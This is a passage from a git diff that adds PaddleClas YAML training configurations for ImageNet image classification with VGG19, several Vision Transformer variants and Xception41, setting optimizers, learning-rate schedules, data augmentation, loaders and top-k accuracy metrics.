224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml new file mode 100644 index 0000000..195c641 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG19.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 150 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG19 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml new file mode 100644 index 0000000..59c38e6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml new file mode 100644 index 0000000..0c76f69 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch16_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml new file mode 100644 index 0000000..88eab3f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_base_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_base_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml new file mode 100644 index 0000000..7ffe859 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_huge_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml new file mode 100644 index 0000000..14d892e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_huge_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_huge_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml new file mode 100644 index 0000000..74a6f40 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml new file mode 100644 index 0000000..81abc1b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch16_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch16_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml new file mode 100644 index 0000000..933fd7a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_large_patch32_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 384, 384] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_large_patch32_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 384 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 384 + - CropImage: + size: 384 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml new file mode 100644 index 0000000..eea4922 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VisionTransformer/ViT_small_patch16_224.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ViT_small_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml new file mode 100644 index 0000000..76dd776 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception41 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - 